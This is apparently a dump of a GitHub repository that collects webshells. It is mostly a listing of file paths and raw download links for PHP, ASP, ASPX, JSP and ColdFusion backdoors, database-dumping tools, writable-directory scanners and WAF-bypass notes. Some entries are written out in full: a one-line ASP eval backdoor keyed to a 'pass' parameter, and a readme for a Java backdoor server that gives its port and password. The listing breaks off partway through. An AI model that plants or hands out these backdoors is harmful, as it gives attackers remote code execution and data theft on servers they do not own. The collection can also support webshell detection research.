8 | < input type=submit value="提交"> 9 | < /form> -------------------------------------------------------------------------------- /net-friend/ChatRoom/菊花聊天室.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/ChatRoom/菊花聊天室.asp -------------------------------------------------------------------------------- /net-friend/ChatRoom/菊花聊天室.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/ChatRoom/菊花聊天室.php -------------------------------------------------------------------------------- /net-friend/asp/01.asp: -------------------------------------------------------------------------------- 1 | <%eval request("pass")%> -------------------------------------------------------------------------------- /net-friend/asp/1.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/1.asp -------------------------------------------------------------------------------- /net-friend/asp/121.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/121.jpg -------------------------------------------------------------------------------- /net-friend/asp/asp目录可写扫描/wt.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/asp目录可写扫描/wt.asp -------------------------------------------------------------------------------- /net-friend/asp/asp目录可写扫描/wt.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/asp目录可写扫描/wt.aspx -------------------------------------------------------------------------------- /net-friend/asp/google.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/google.jpg -------------------------------------------------------------------------------- /net-friend/asp/mssql在线管理.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/mssql在线管理.asp -------------------------------------------------------------------------------- /net-friend/asp/一句话.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/一句话.doc -------------------------------------------------------------------------------- /net-friend/asp/修改属性.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/修改属性.asp -------------------------------------------------------------------------------- /net-friend/asp/陆羽asp打包/1.bat: -------------------------------------------------------------------------------- 1 | cscript unpack.vbs -------------------------------------------------------------------------------- /net-friend/asp/陆羽asp打包/cscript.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/陆羽asp打包/cscript.exe -------------------------------------------------------------------------------- /net-friend/asp/陆羽asp打包/unpack.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/asp/陆羽asp打包/unpack.vbs -------------------------------------------------------------------------------- /net-friend/aspx/1.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/aspx/1.aspx -------------------------------------------------------------------------------- /net-friend/aspx/aspxspy/read.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/aspx/aspxspy/read.txt -------------------------------------------------------------------------------- /net-friend/aspx/read.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/aspx/read.txt -------------------------------------------------------------------------------- /net-friend/aspx/sniffer--aspx的嗅探工具.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/aspx/sniffer--aspx的嗅探工具.aspx -------------------------------------------------------------------------------- /net-friend/aspx/view.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/aspx/view.aspx -------------------------------------------------------------------------------- /net-friend/aspx/干净清爽的大马,不怎么好用.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/aspx/干净清爽的大马,不怎么好用.aspx -------------------------------------------------------------------------------- /net-friend/aspx/脱裤4ngle.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/aspx/脱裤4ngle.aspx -------------------------------------------------------------------------------- /net-friend/cfm/ColdFusion.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/cfm/ColdFusion.chm -------------------------------------------------------------------------------- /net-friend/cfm/list.cfm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/cfm/list.cfm -------------------------------------------------------------------------------- /net-friend/cfm/xl.cfm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/cfm/xl.cfm -------------------------------------------------------------------------------- /net-friend/jsp/JFolder.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/JFolder.jsp -------------------------------------------------------------------------------- /net-friend/jsp/in.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/in.jsp -------------------------------------------------------------------------------- /net-friend/jsp/job.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/job.jsp -------------------------------------------------------------------------------- /net-friend/jsp/jspbrowser/1.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/jspbrowser/1.jsp -------------------------------------------------------------------------------- /net-friend/jsp/jspbrowser/2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/jspbrowser/2.jsp -------------------------------------------------------------------------------- /net-friend/jsp/ma1.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/ma1.jsp -------------------------------------------------------------------------------- /net-friend/jsp/ma2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/ma2.jsp -------------------------------------------------------------------------------- /net-friend/jsp/ma3.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/ma3.jsp -------------------------------------------------------------------------------- /net-friend/jsp/ma4.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/ma4.jsp -------------------------------------------------------------------------------- /net-friend/jsp/no.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/no.jsp -------------------------------------------------------------------------------- /net-friend/jsp/silic webshell.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/silic webshell.jsp -------------------------------------------------------------------------------- /net-friend/jsp/spjspshell.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/jsp/spjspshell.jsp -------------------------------------------------------------------------------- /net-friend/php/2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /net-friend/php/moon.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/php/moon.php -------------------------------------------------------------------------------- /net-friend/php/php一句话后门.TXT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/php/php一句话后门.TXT -------------------------------------------------------------------------------- /net-friend/php/php网站打包(dodo)/php网站打包(dodo).doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/php/php网站打包(dodo)/php网站打包(dodo).doc -------------------------------------------------------------------------------- /net-friend/php/php网站打包(dodo)/zip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/php/php网站打包(dodo)/zip.php -------------------------------------------------------------------------------- /net-friend/php/s-u.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/php/s-u.php -------------------------------------------------------------------------------- /net-friend/php/零魂PHP一句话木马客户端%28一键提交版%29/零魂PHP一句话木马客户端(一键提交版)/Readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/php/零魂PHP一句话木马客户端%28一键提交版%29/零魂PHP一句话木马客户端(一键提交版)/Readme.txt -------------------------------------------------------------------------------- /net-friend/php/零魂PHP一句话木马客户端%28一键提交版%29/零魂PHP一句话木马客户端(一键提交版)/零魂PHP一句话木马客户端.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/php/零魂PHP一句话木马客户端%28一键提交版%29/零魂PHP一句话木马客户端(一键提交版)/零魂PHP一句话木马客户端.htm -------------------------------------------------------------------------------- /net-friend/war/test3693.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/war/test3693.war -------------------------------------------------------------------------------- /net-friend/可读写目录探测/PHP 搜索可读可写目录脚本.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/可读写目录探测/PHP 搜索可读可写目录脚本.php -------------------------------------------------------------------------------- /net-friend/可读写目录探测/啊D小工具 - 目录读写检测 [ASP版].asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/可读写目录探测/啊D小工具 - 目录读写检测 [ASP版].asp -------------------------------------------------------------------------------- /net-friend/可读写目录探测/啊D小工具 - 目录读写检测 [ASP版]说明.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/可读写目录探测/啊D小工具 - 目录读写检测 [ASP版]说明.txt -------------------------------------------------------------------------------- /net-friend/可读写目录探测/很好用的扫可读可写目录asp脚本xwdir.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/net-friend/可读写目录探测/很好用的扫可读可写目录asp脚本xwdir.asp -------------------------------------------------------------------------------- /other shell repository: -------------------------------------------------------------------------------- 1 | add other webshell collect repository 2 | url : https://github.com/tdifg/WebShell 3 | 4 | add public-shell repository 5 | url : https://github.com/BDLeet/public-shell 6 | -------------------------------------------------------------------------------- /other/Axis2Shell/config.aar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/Axis2Shell/config.aar -------------------------------------------------------------------------------- /other/README.md: -------------------------------------------------------------------------------- 1 | 此文件夹为其他脚本,具体功能的话,还需要各位自己测试 2 | -------------------------------------------------------------------------------- /other/acat/ACat-src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/acat/ACat-src.zip -------------------------------------------------------------------------------- /other/acat/ACat-附数据库驱动-jdk1.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/acat/ACat-附数据库驱动-jdk1.5.jar -------------------------------------------------------------------------------- /other/acat/ACat-附数据库驱动.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/acat/ACat-附数据库驱动.jar -------------------------------------------------------------------------------- /other/acat/ACat.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/acat/ACat.jar -------------------------------------------------------------------------------- /other/acat/ACat_jdk1.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/acat/ACat_jdk1.5.jar -------------------------------------------------------------------------------- /other/acat/readme.md: -------------------------------------------------------------------------------- 1 | Author:园长MM 2 | 3 | 4 | 下载: 5 | ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar、 ACat-jdk.1.7.jar、ACat-附数据库驱动.jar 6 | 7 | 源码: 8 | ACat-src.zip 9 | 10 | 描述: 11 | 12 | 这是一个用java实现的非常小(18kb)的webServer。之前在drops发了一个简单的demo:http://drops.wooyun.org/papers/869。这个也非常简单,只实现了几个servlet的api,不过已实现了后门相关的其他功能。启动成功后会开启9527端口,然后访问:http://xxx.com:9527/api.jsp,密码:023。 13 | 14 | 停止服务:http://xxx.com:9527/api.jsp?action=stop 15 | 16 | 密码和端口配置在jar里面的server.properties: 17 | 18 | 19 | 20 | 运行方式:java -jar ACat.jar或者在jsp里面调用。 21 | 22 | 23 | 24 | 如果需要连接数据库需要下载:ACat-附数据库驱动.jar,或者自行添加相关jar。 -------------------------------------------------------------------------------- /other/bypass_waf.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/bypass_waf.txt -------------------------------------------------------------------------------- /other/cat.aar/Readme.md: -------------------------------------------------------------------------------- 1 | #axis2 利用小工具cat.aar 2 | 3 | Author:园长 4 | 文章url:http://p2j.cn/?p=1548 5 | [下载文章的pdf](https://raw.githubusercontent.com/tennc/webshell/master/other/cat.aar/axis2%20%E5%88%A9%E7%94%A8%E5%B0%8F%E5%B7%A5%E5%85%B7cat.pdf) 6 | -------------------------------------------------------------------------------- /other/cat.aar/axis2 利用小工具cat.aar.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/cat.aar/axis2 利用小工具cat.aar.zip -------------------------------------------------------------------------------- /other/cat.aar/axis2 利用小工具cat.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/cat.aar/axis2 利用小工具cat.pdf -------------------------------------------------------------------------------- /other/icesword.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/icesword.war -------------------------------------------------------------------------------- /other/jdk1.3webshell/readme.MD: -------------------------------------------------------------------------------- 1 | jdk 1.3 tomcat 7测试通过 2 | 3 | jdk 1.3 weblogic 8测试通过 4 | 5 | 只完成基本的文件操作功能(文件浏览,上传、下载、删除、编辑)和命令执行 6 | 7 | [site](http://www.shack2.org/article/1415181383.html) -------------------------------------------------------------------------------- /other/jdk1.3webshell/test.ear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/jdk1.3webshell/test.ear -------------------------------------------------------------------------------- /other/jdk1.3webshell/test.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/jdk1.3webshell/test.war -------------------------------------------------------------------------------- /other/pwd.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/pwd.txt -------------------------------------------------------------------------------- /other/sshback-v0.1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/sshback-v0.1.tar.gz -------------------------------------------------------------------------------- /other/zs.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/other/zs.war -------------------------------------------------------------------------------- /php/2011.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/2011.php -------------------------------------------------------------------------------- /php/Crack8_PHP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/Crack8_PHP.txt -------------------------------------------------------------------------------- /php/DAws.md: -------------------------------------------------------------------------------- 1 | DAws a php webshell 2 | 3 | Author:[dotcppfile](https://github.com/dotcppfile/) 4 | 5 | url:https://github.com/dotcppfile/DAws 6 | 7 | There's multiple things that makes DAws better than every Web Shell out there: 8 | 9 | ![alt tag](http://i.imgur.com/nUmccKQ.png) 10 | 11 | -------------------------------------------------------------------------------- /php/PHPshell/Antichat Shell v1.3/Antichat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Antichat Shell v1.3/Antichat.jpg -------------------------------------------------------------------------------- /php/PHPshell/Crystal/Crystal.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Crystal/Crystal.jpg -------------------------------------------------------------------------------- /php/PHPshell/Crystal/Crystal.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Crystal/Crystal.php -------------------------------------------------------------------------------- /php/PHPshell/Crystal/Crystal2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Crystal/Crystal2.jpg -------------------------------------------------------------------------------- /php/PHPshell/Crystal/Crystal3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Crystal/Crystal3.jpg -------------------------------------------------------------------------------- /php/PHPshell/Dx/Dx.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Dx/Dx.jpg -------------------------------------------------------------------------------- /php/PHPshell/Dx/Dx.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Dx/Dx.php -------------------------------------------------------------------------------- /php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg -------------------------------------------------------------------------------- /php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg -------------------------------------------------------------------------------- /php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg -------------------------------------------------------------------------------- /php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php -------------------------------------------------------------------------------- /php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL2.jpg -------------------------------------------------------------------------------- /php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.jpg -------------------------------------------------------------------------------- /php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php -------------------------------------------------------------------------------- /php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP2.jpg -------------------------------------------------------------------------------- /php/PHPshell/PH Vayv/PH Vayv.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PH Vayv/PH Vayv.jpg -------------------------------------------------------------------------------- /php/PHPshell/PH Vayv/PH Vayv.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PH Vayv/PH Vayv.php -------------------------------------------------------------------------------- /php/PHPshell/PHP Shell/PHP Shell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PHP Shell/PHP Shell.jpg -------------------------------------------------------------------------------- /php/PHPshell/PHP Shell/PHP Shell2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PHP Shell/PHP Shell2.jpg -------------------------------------------------------------------------------- /php/PHPshell/PHP Shell/PHP Shell3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PHP Shell/PHP Shell3.jpg -------------------------------------------------------------------------------- /php/PHPshell/PHPRemoteView/PHPRemoteView.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PHPRemoteView/PHPRemoteView.jpg -------------------------------------------------------------------------------- /php/PHPshell/PHPRemoteView/PHPRemoteView.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PHPRemoteView/PHPRemoteView.php -------------------------------------------------------------------------------- /php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg -------------------------------------------------------------------------------- /php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg -------------------------------------------------------------------------------- /php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php -------------------------------------------------------------------------------- /php/PHPshell/c99/c99.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99/c99.jpg -------------------------------------------------------------------------------- /php/PHPshell/c99_PSych0/c99_PSych0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99_PSych0/c99_PSych0.jpg -------------------------------------------------------------------------------- /php/PHPshell/c99_PSych0/c99_PSych0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99_PSych0/c99_PSych0.php -------------------------------------------------------------------------------- /php/PHPshell/c99_locus7s/c99_locus7s.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99_locus7s/c99_locus7s.jpg -------------------------------------------------------------------------------- /php/PHPshell/c99_locus7s/c99_locus7s2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99_locus7s/c99_locus7s2.jpg -------------------------------------------------------------------------------- /php/PHPshell/c99_w4cking/c99_w4cking.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99_w4cking/c99_w4cking.jpg -------------------------------------------------------------------------------- /php/PHPshell/c99_w4cking/c99_w4cking2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99_w4cking/c99_w4cking2.jpg -------------------------------------------------------------------------------- /php/PHPshell/c99shell/c99shell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99shell/c99shell.jpg -------------------------------------------------------------------------------- /php/PHPshell/c99shell/c99shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/c99shell/c99shell.php -------------------------------------------------------------------------------- /php/PHPshell/ctt_sh/ctt_sh.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/ctt_sh/ctt_sh.jpg -------------------------------------------------------------------------------- /php/PHPshell/ctt_sh/ctt_sh.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/ctt_sh/ctt_sh.php -------------------------------------------------------------------------------- /php/PHPshell/gfs_sh/gfs_sh.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/gfs_sh/gfs_sh.jpg -------------------------------------------------------------------------------- /php/PHPshell/gfs_sh/gfs_sh.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/gfs_sh/gfs_sh.php -------------------------------------------------------------------------------- /php/PHPshell/gfs_sh/gfs_sh2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/gfs_sh/gfs_sh2.jpg -------------------------------------------------------------------------------- /php/PHPshell/iMHaPFtp/iMHaPFtp.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/iMHaPFtp/iMHaPFtp.jpg -------------------------------------------------------------------------------- /php/PHPshell/iMHaPFtp/iMHaPFtp.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/iMHaPFtp/iMHaPFtp.php -------------------------------------------------------------------------------- /php/PHPshell/nstview/nstview.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/nstview/nstview.jpg -------------------------------------------------------------------------------- /php/PHPshell/nstview/nstview.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/nstview/nstview.php -------------------------------------------------------------------------------- /php/PHPshell/nstview/nstview2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/nstview/nstview2.jpg -------------------------------------------------------------------------------- /php/PHPshell/r57shell/r57shell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/r57shell/r57shell.jpg -------------------------------------------------------------------------------- /php/PHPshell/r57shell/r57shell.php: 